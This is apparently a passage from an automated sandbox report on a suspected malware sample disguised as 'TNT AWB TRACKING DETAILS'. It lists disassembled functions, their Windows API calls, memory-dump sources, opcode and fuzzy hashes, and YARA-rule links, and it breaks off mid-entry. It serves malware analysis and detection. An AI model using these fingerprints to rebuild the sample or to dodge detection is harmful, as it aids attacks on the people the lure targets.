                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpCreateFile
                                      • API String ID: 2574300362-275556492
                                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                      Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: ICMP.DLL$IcmpSendEcho
                                      • API String ID: 2574300362-58917771
                                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                      Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                      • API String ID: 2574300362-4033151799
                                      • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                      • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                      • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                      • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                      Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                      • __itow.LIBCMT ref: 004699CD
                                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                      • __itow.LIBCMT ref: 00469A97
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow
                                      • String ID:
                                      • API String ID: 3379773720-0
                                      • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                      • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                      Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                                      • ScreenToClient.USER32(?,?), ref: 00449A80
                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$ClientMoveRectScreen
                                      • String ID:
                                      • API String ID: 3880355969-0
                                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                      Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                      • String ID:
                                      • API String ID: 2782032738-0
                                      • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                      • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                      • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                      • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                      Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                      • GetWindowRect.USER32(?,?), ref: 00441722
                                      • PtInRect.USER32(?,?,?), ref: 00441734
                                      • MessageBeep.USER32(00000000), ref: 004417AD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                      • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                      • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                      • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                      Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                      • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                      • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                      • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                      Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                      • __isleadbyte_l.LIBCMT ref: 004208A6
                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                      • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                      • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                      • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                      Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 004503C8
                                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Proc$Parent
                                      • String ID:
                                      • API String ID: 2351499541-0
                                      • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                      • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                      • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                      • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                      Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                      • TranslateMessage.USER32(?), ref: 00442B01
                                      • DispatchMessageW.USER32(?), ref: 00442B0B
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchTranslate
                                      • String ID:
                                      • API String ID: 1795658109-0
                                      • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                      • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                      • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                      • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                      Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                      • GetCaretPos.USER32(?), ref: 004743B2
                                      • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                      • GetForegroundWindow.USER32 ref: 004743EE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                      • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                      • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                      • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                      Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                      • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                      • _wcslen.LIBCMT ref: 00449519
                                      • _wcslen.LIBCMT ref: 00449526
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend_wcslen$_wcspbrk
                                      • String ID:
                                      • API String ID: 2886238975-0
                                      • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                      • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                      • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                      • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                      Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __setmode$DebugOutputString_fprintf
                                      • String ID:
                                      • API String ID: 1792727568-0
                                      • Opcode ID: 21db2ec1bcc2986c47425e22e021f250b78b3462fb6fb1bb1b9df07b86064711
                                      • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                      • Opcode Fuzzy Hash: 21db2ec1bcc2986c47425e22e021f250b78b3462fb6fb1bb1b9df07b86064711
                                      • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                      Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Long$AttributesLayered
                                      • String ID:
                                      • API String ID: 2169480361-0
                                      • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                      • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                      • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                      • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                      Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                        • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                        • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                      • lstrlenW.KERNEL32(?), ref: 00434CF6
